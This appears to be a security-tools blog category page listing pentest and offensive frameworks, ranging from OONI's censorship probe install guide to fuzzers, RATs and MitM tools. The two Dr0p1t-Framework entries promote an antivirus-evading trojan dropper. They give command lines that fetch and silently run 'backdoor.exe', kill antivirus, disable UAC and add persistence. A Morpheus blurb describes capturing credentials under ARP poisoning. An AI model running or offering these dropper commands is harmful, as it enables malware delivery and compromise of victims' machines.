Framework


Hakku Framework – Simple Penetration Testing Framework

Hakku is a simple framework that has been made for penetration testing tools. The Hakku framework offers a simple structure, a basic CLI, and useful features for developing penetration testing tools. Hakku is at an early stage and may be unstable, so please down…


Operative – The Fingerprint Framework

This is a fram…




PyJFuzz – Python JSON Fuzzer

PyJFuzz is a small, extensible and ready-to-use framework used to fuzz JSON inputs, such as mobile REST API endpoints, JSON implementations, browsers, CLI executables and much more. Version 1.1.0 Homepag…



OONI – Open Observatory of Network Interference

OONI, the Open Observatory of Network Interference, is a global observation network whose aim is to collect high quality data using open methodologies, using Free and Open Source Software (FL/OSS) to share observations and data about the various types, methods, and amounts of network tampering in the world.
“The Net interprets censorship as damage and routes around it.”
  • John Gilmore; TIME magazine (6 December 1993)
ooniprobe is the first program that users run to probe their network and to collect data for the OONI project. Are you interested in testing your network for signs of surveillance and censorship? Do you want to collect data to share with others, so that you and others may better understand your network? If so, please read this document and we hope ooniprobe will help you to gather network data that will assist you with your endeavors!


Read this before running ooniprobe!
Running ooniprobe is a potentially risky activity. How risky depends greatly on the jurisdiction you are in and on which test you are running. It is technically possible for a person observing your internet connection to be aware of the fact that you are running ooniprobe. This means that if running network measurement tests is considered illegal in your country, you could be spotted.
Furthermore, ooniprobe takes no precautions to protect the install target machine from forensic analysis. If the fact that you have installed or used ooniprobe is a liability for you, please be aware of this risk.

OONI in 5 minutes
The latest ooniprobe version for Debian and Ubuntu releases can be found in the deb.torproject.org package repository.
On Debian stable (jessie):

gpg --keyserver keys.gnupg.net --recv A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
echo 'deb http://deb.torproject.org/torproject.org jessie main' | sudo tee /etc/apt/sources.list.d/ooniprobe.list
sudo apt-get update
sudo apt-get install ooniprobe deb.torproject.org-keyring

On Debian testing:

gpg --keyserver keys.gnupg.net --recv A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
echo 'deb http://deb.torproject.org/torproject.org testing main' | sudo tee /etc/apt/sources.list.d/ooniprobe.list
sudo apt-get update
sudo apt-get install ooniprobe deb.torproject.org-keyring

On Debian unstable:

gpg --keyserver keys.gnupg.net --recv A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
echo 'deb http://deb.torproject.org/torproject.org unstable main' | sudo tee /etc/apt/sources.list.d/ooniprobe.list
sudo apt-get update
sudo apt-get install ooniprobe deb.torproject.org-keyring

On Ubuntu 16.10 (yakkety), 16.04 (xenial) or 14.04 (trusty):

gpg --keyserver keys.gnupg.net --recv A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
echo 'deb http://deb.torproject.org/torproject.org $RELEASE main' | sudo tee /etc/apt/sources.list.d/ooniprobe.list
sudo apt-get update
sudo apt-get install ooniprobe deb.torproject.org-keyring

Note: You’ll need to swap out $RELEASE for either yakkety, xenial or trusty. This will not happen automatically. You will also need to ensure that you have the universe repository enabled. The universe repository is enabled by default in a standard Ubuntu installation, but may not be on some minimal or non-standard installations.

Installation

Mac OS X
You can install ooniprobe on OSX if you have installed homebrew (http://mxcl.github.io/homebrew) with:

brew install ooniprobe


Unix systems (with pip)
Make sure you have installed the following dependencies:

  • build-essential
  • python (>=2.7)
  • python-dev
  • pip
  • libgeoip-dev
  • libdumbnet-dev
  • libpcap-dev
  • libssl-dev
  • libffi-dev
  • tor (>=0.2.5.1 to run all the tor related tests)

Optional dependencies:

  • obfs4proxy

On Debian-based systems this can generally be done by running:

sudo apt-get install -y build-essential libdumbnet-dev libpcap-dev libgeoip-dev libffi-dev python-dev python-pip tor libssl-dev obfs4proxy

Then you should be able to install ooniprobe by running:

sudo pip install ooniprobe

or install ooniprobe as a user:

pip install ooniprobe


Using ooniprobe
A net test is a set of measurements used to assess what kind of internet censorship is occurring.
Decks are collections of ooniprobe net tests with some associated inputs.
A collector is a service used to report the results of measurements.
A test helper is a service used by a probe to successfully perform its measurements.
A bouncer is a service used to discover the addresses of test helpers and collectors.

Configuring ooniprobe
After successfully installing ooniprobe you should be able to access the web UI on your host machine at http://localhost:8842/.
You should now be presented with the web UI setup wizard, where you can read about the risks involved in running ooniprobe. Upon answering the quiz correctly you can enable or disable ooniprobe tests, set how you connect to the measurement collector, and finally configure your privacy settings.
By default ooniprobe will not include personally identifying information in the test results, nor create a pcap file. This behavior can be customized.

Run ooniprobe as a service (systemd)
As of ooniprobe version 2.0.0 there is no need for cron jobs, as ooniprobe-agent is responsible for task scheduling.
You can ensure that ooniprobe-agent is always running by installing and enabling the systemd unit ooniprobe.service:

wget https://raw.githubusercontent.com/TheTorProject/ooni-probe/master/scripts/systemd/ooniprobe.service --directory-prefix=/etc/systemd/system
systemctl enable ooniprobe
systemctl start ooniprobe

You should see similar output if the ooniprobe systemd service is active and loaded when you run systemctl status ooniprobe:

● ooniprobe.service - ooniprobe.service, network interference detection tool
Loaded: loaded (/etc/systemd/system/ooniprobe.service; enabled)
Active: active (running) since Thu 2016-10-20 09:17:42 UTC; 16s ago
Process: 311 ExecStart=/usr/local/bin/ooniprobe-agent start (code=exited, status=0/SUCCESS)
Main PID: 390 (ooniprobe-agent)
CGroup: /system.slice/ooniprobe.service
└─390 /usr/bin/python /usr/local/bin/ooniprobe-agent start


Setting capabilities on your virtualenv python binary
If your distribution supports capabilities you can avoid needing to run OONI as root:

setcap cap_net_admin,cap_net_raw+eip /path/to/your/virtualenv's/python2


Reporting bugs
You can report bugs and issues you find with ooni-probe on The Tor Project issue tracker, filing them under the “Ooni” component: https://trac.torproject.org/projects/tor/newticket?component=Ooni.
You can either register an account or use the group account “cypherpunks” with password “writecode”.

Contributing
You can download the code for ooniprobe from the following git repository:

git clone https://github.com/TheTorProject/ooni-probe.git

You should then submit patches for review as pull requests to this GitHub repository:
https://github.com/TheTorProject/ooni-probe
Read this article to learn how to create a pull request on GitHub (https://help.github.com/articles/creating-a-pull-request).
If you prefer not to use GitHub (or don’t have an account), you may also submit patches as attachments to tickets.
Be sure to format the patch (given that you are working on a feature branch that is different from master) with:

git format-patch master --stdout > my_first_ooniprobe.patch


Setting up development environment
On Debian-based systems a development environment can be set up as follows (prerequisites include build-essential, python-dev, and tor; for tor see https://www.torproject.org/docs/debian.html.en):

sudo apt-get install python-pip python-virtualenv virtualenv
sudo apt-get install libgeoip-dev libffi-dev libdumbnet-dev libssl-dev libpcap-dev
git clone https://github.com/TheTorProject/ooni-probe
cd ooni-probe
virtualenv venv

virtualenv venv will create a folder in the current directory which will contain the Python executable files, and a copy of the pip library which you can use to install other packages. To begin using the virtual environment, it needs to be activated:

source venv/bin/activate
pip install -r requirements.txt
pip install -r requirements-dev.txt
python setup.py install
ooniprobe -s # if all went well, lists available tests



Glue – Application Security Automation

Glue is a framework for running a series of tools. Generally, it is intended as a backbone for automating a security analysis pipeline of tools. Recommended Usage For those wishing to run Glue, we recommend using the docker image because …


EaST – Exploits and Security Tools Framework

A pentest framework environment is the basis of an IT security specialist’s toolkit. This software is essential both for learning and improving knowledge of attacks on IT systems, and for inspections and proactive protection. The need for a native, comprehensive open source pentest framework with a high level of trust has existed for a long time. That is why the EAST framework was created for native and native-friendly IT security markets. EAST is a framework that has all the necessary resources to run a wide range of exploits, from web to buffer overruns. EAST differs from similar toolkits by its ease of use: even a beginner can handle it and start to advance in IT security.

Main features:
  • Framework security. Software used for IT security must have a high level of user trust. EAST is implemented in open source Python code that is easy to check, and that code is used for all parts of the framework and its modules. The relatively small amount of code eases its verification by any user. No OS changes are applied during software installation.
  • Framework maximum simplicity. Download the archive and launch the main Python script, start.py, which lets you start and stop exploits and handles message traffic. Everything is handled locally or remotely via a browser.
  • Simplicity of creating and editing exploits. Modules and exploits can be edited and added on the fly without a restart. The module code body is simple and minimal in size.
  • Cross-platform with minimal requirements and dependencies. Tested on Windows and Linux; it should work anywhere Python is installed. The framework contains all of its dependencies and does not download additional libraries.
  • Full capacity of a vanilla pentest framework. Despite its simplicity and lack of bloat, the framework has all the necessary resources to run a wide range of exploits, from web to buffer overruns.
  • Wide enhancement possibilities. Third-party developers can create their own open source solutions or participate in EAST development by using the server-client architecture, the message traffic API and the support libraries.

Requirements

Usage

git clone https://github.com/C0reL0ader/EaST && cd EaST
python start.py [-p PORT] [--all-interfaces]

Additional resources


Dr0p1t-Framework 1.2 – A Framework That Creates An Advanced FUD Dropper With Some Tricks

Have you ever heard about trojan droppers?

In short, a dropper is a type of trojan that downloads other malware, and Dr0p1t gives you the chance to create a dropper that bypasses most AVs and has some tricks 😉

Features

  • Framework works with Windows and Linux
  • Downloads the executable onto the target system and executes it silently
  • The executable size is small compared to other droppers generated the same way
  • Self-destruct function, so that the dropper will kill and delete itself after finishing its work
  • Adding the executable to startup after downloading it
  • Adding the executable to the task scheduler after downloading it (UAC does not matter)
  • Finding and killing the antivirus before running the malware
  • Running a custom (batch|powershell|vbs) file you have chosen before running the executable
  • The ability to disable UAC
  • When running PowerShell scripts it can bypass the execution policy
  • Using UPX to compress the dropper after creating it
  • Choosing an icon for the dropper after creating it


Screenshots

On Windows

On Linux (Backbox)

Help menu

Usage: Dr0p1t.py Malware_Url [Options]

options:
-h, --help show this help message and exit
-s Add your malware to startup (Persistence)
-t Add your malware to task scheduler (Persistence)
-k Kill antivirus process before running your malware.
-b Run this batch script before running your malware. Check scripts folder
-p Run this powershell script before running your malware. Check scripts folder
-v Run this vbs script before running your malware. Check scripts folder
--only32 Download your malware for 32 bit devices only
--only64 Download your malware for 64 bit devices only
--upx Use UPX to compress the final file.
--nouac Disable UAC on victim device
--nocompile Tell the framework to not compile the final file.
-i Use icon to the final file. Check icons folder.
-q Stay quite ( no banner )
-u Check for updates
-nd Display less output information

Examples

./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --nouac -i flash.ico

Prerequisites

  • Python 2 or Python 3.

The recommended version for Python 2 is 2.7.x, the recommended version for Python 3 is 3.5.x, and don’t use 3.6 because it’s not supported yet by PyInstaller.

  • Python libraries requirements in requirements.txt

Needed dependencies for linux

  • Wine
  • Python 2.7 on Wine Machine

Note: You must have root access

Installation
If you are on Linux, do

git clone https://github.com/D4Vinci/Dr0p1t-Framework
chmod 777 -R Dr0p1t-Framework
cd Dr0p1t-Framework
pip install -r requirements.txt
./Dr0p1t.py

And if you are on Windows, download it and then do

cd Dr0p1t-Framework
pip install -r requirements.txt
pip install -r windows_requirements.txt
./Dr0p1t.py

Libraries in windows_requirements.txt are used to enable Unicode on Windows, which makes coloring possible.

Tested on:

  • Kali Linux – SANA
  • Ubuntu 14.04-16.04 LTS
  • Windows 10/8.1/8

Changelog v1.2

  • PyInstaller compiling on Linux using Wine
  • PyInstaller compiling on Windows will not use UPX, which fixes compiling on Windows
  • Added the ability to disable and bypass UAC
  • Updated the antivirus list in the antivirus killer
  • Added a SelfDestruct function so that the dropper will kill and delete itself after finishing its work :smile:
  • Full framework rewrite and recheck to fix errors and typos, and replacing some libraries to make the size of the final file smaller
  • Started working on some SE tricks to fool the user, and there are a lot of good options on the way 😉 Stay tuned

Contact


Stitch – Python Remote Administration Tool (RAT)

This is a cross platform python framework which allows you to build custom payloads for Windows, Mac OSX and Linux as well. You are able to select whether the payload binds to a specific IP and port, listens for a connection on a port, option to send a…


TheFatRat v1.8 – Easy Tool For Generate Backdoor with Msfvenom

What is TheFatRat? An easy tool to generate a backdoor with msfvenom (part of the Metasploit framework) and an easy tool for post-exploitation attacks like browser attacks and DLL attacks. This tool compiles malware with a popular payload, and then the compiled malwar…


Dr0p1t-Framework – A Framework That Creates An Advanced FUD Dropper With Some Tricks

Have you ever heard about trojan droppers? You can read about them from here.
Dr0p1t lets you create a dropper like any tool, but this time FUD with some tricks 😉

Features

  • Works with Windows and Linux
  • Adding the malware to startup after downloading it
  • Adding the malware to the task scheduler after downloading it
  • Finding and killing the antivirus before running the malware
  • Running a custom (batch|powershell|vbs) file you have chosen before running the malware
  • When running PowerShell scripts it can bypass the execution policy
  • Using UPX to compress the dropper after creating it
  • Choosing an icon for the dropper after creating it


Screenshots

On Windows

On Linux (Backbox)

Help menu

Usage: Dr0p1t.py Malware_Url [Options]

options:
-h, --help show this help message and exit
-s Add your malware to startup (Persistence)
-t Add your malware to task scheduler (Persistence)
-k Kill antivirus process before running your malware.
-b Run this batch script before running your malware. Check scripts folder
-p Run this powershell script before running your malware. Check scripts folder
-v Run this vbs script before running your malware. Check scripts folder
--only32 Download your malware for 32 bit devices only
--only64 Download your malware for 64 bit devices only
--upx Use UPX to compress the final file.
-i Use icon to the final file. Check icons folder.
-q Stay quite ( no banner )
-u Check for updates
-nd Display less output information

Examples

./Dr0p1t.py https://test.com/backdoor.exe -s -t -k --upx
./Dr0p1t.py https://test.com/backdoor.exe -k -b block_online_scan.bat --only32
./Dr0p1t.py https://test.com/backdoor.exe -s -t -k -p Enable_PSRemoting.ps1

Prerequisites

  • Python 3.x (preferred 3.5)
  • Python libraries requirements in requirements.txt

Installation
First download it with

git clone https://github.com/D4Vinci/Dr0p1t-Framework

If you are on Linux, do

cd Dr0p1t-Framework
pip install -r requirements.txt
./Dr0p1t.py

And if you are on Windows, download it and then do

cd Dr0p1t-Framework
pip install -r requirements.txt
pip install -r windows_requirements.txt
./Dr0p1t.py

Libraries in windows_requirements.txt are used to enable Unicode on Windows, which makes coloring possible.

Todo

  • Python 2 support
  • Work on UAC bypass
  • Work on spreading on the device, and maybe in the LAN too
  • Injecting dr0pp3r into another program
  • More modules


PoshC2 – Powershell C2 Server and Implants

PoshC2 is a proxy aware C2 framework written completely in PowerShell to aid penetration testers with red teaming, post-exploitation and lateral movement. The tools and modules were developed off the back of our successful PowerShell sessions and paylo…


Morpheus – Automated Ettercap TCP/IP Hijacking Tool

The Morpheus framework automates TCP/UDP packet manipulation tasks by using etter filters to manipulate target requests/responses under MitM attacks, replacing the TCP/UDP packet contents with our contents before forwarding the packet back to the target host…

workflow:
1º – attacker -> arp poison local lan (mitm)
2º – target   -> requests webpage from network (wan)
3º – attacker -> modifies webpage response (contents)
4º – attacker -> modified packet is forwarded back to target host
morpheus ships with some pre-configured filters, but it allows users to improve them when launching the attack (morpheus scripting console). At the end of the attack morpheus will revert the filter back to its default state; this allows users to improve filters at run time without fear of messing up the filter command syntax and spoiling the filter.
“Perfect for scripting fans to safely test new concepts”…

What can we accomplish by using filters?

morpheus ships with a collection of etter filters written by me to accomplish various tasks: replacing images in webpages, replacing text in webpages, injecting payloads using the HTML <form> tag, denial-of-service attacks (drop or kill packets from source), https/ssh downgrade attacks, redirecting target browser traffic to another domain; it also gives you the ability to build and compile your own filter from scratch and launch it through the morpheus framework (option W).

“filters can be extended using browser languages like: javascript, css, flash, etc”…

In this example we are using the ” HTML tag” to inject a redirection URL into the target request.
In this example we are using ‘CSS3’ to trigger a 180º webpage rotation.

Framework limitations

1º – morpheus will fail if the target system is protected against ARP poisoning attacks
2º – downgrade attacks will fail if the target browser has installed HTTPS-only add-ons
3º – the target system sometimes needs to clear its net cache for ARP poisoning to be effective
4º – many attacks described in morpheus may be dropped by the target’s HSTS detection system

5º – incorrect number of token (///) in TARGET !!

morpheus by default will run ettercap using IPv6 (USE_IPV6=ACTIVE), as previously configured in the ‘settings’ file. If you are receiving this error, edit the settings file before running morpheus and set (USE_IPV6=DISABLED) to force ettercap to use IPv4.

6º – morpheus needs ettercap to be executed with high privileges (uid 0 | gid 0).
Correct ettercap configuration display (running as admin without SSL dissectors active).

By default morpheus (at startup) will replace the original etter.conf/etter.dns files provided by ettercap; at framework exit morpheus will revert the files to their original state.

Dependencies

ettercap, nmap, apache2, zenity

Framework option 1 [firewall] screenshots

The firewall [option 1] pre-configured filter will capture credentials from the following services:
http, ftp, ssh, telnet (facebook uses https/ssl :( ), report suspicious connections, report common
social browsing (facebook, twitter, youtube), report the existence of botnet connections like
Mocbot IRC Bot and Darkcomet, redirect browser traffic, and allow users to block connections (drop, kill).
"Remember: morpheus gives its users the ability to 'add more rules' to filters before execution"

[morpheus] host:192.168.1.67 [ -> ] port:23 telnet ☆
Source ip addr flow destination rank good

[morpheus] host:192.168.1.67 [ <- ] port:23 telnet ☠
Destination ip flow source port rank suspicious


Basically the firewall filter will act as both an offensive and a defensive tool, analyzing the
TCP/UDP data flow to report logins, suspicious traffic and brute force, block target IPs, etc.



RogueSploit – Powerful social engineering Wi-Fi trap!

RogueSploit is an open source automated script made to create a Fake Access Point, with a dhcpd server, DNS spoofing, host redirection, browser_autopwn1 or autopwn2 or beef+mitmf. TO DO LIST: Add BeEF;[DONE] Add MITMF;[DONE] …


dedsploit – Framework For Attacking Network Protocols

Framework for attacking network protocols and network exploitation. I. Introduction “I don’t look back anymore. I don’t regret. I look forward” – Aiden Pearce. Yes, Watch Dogs has heavily influenced us when writing this framework. This entire…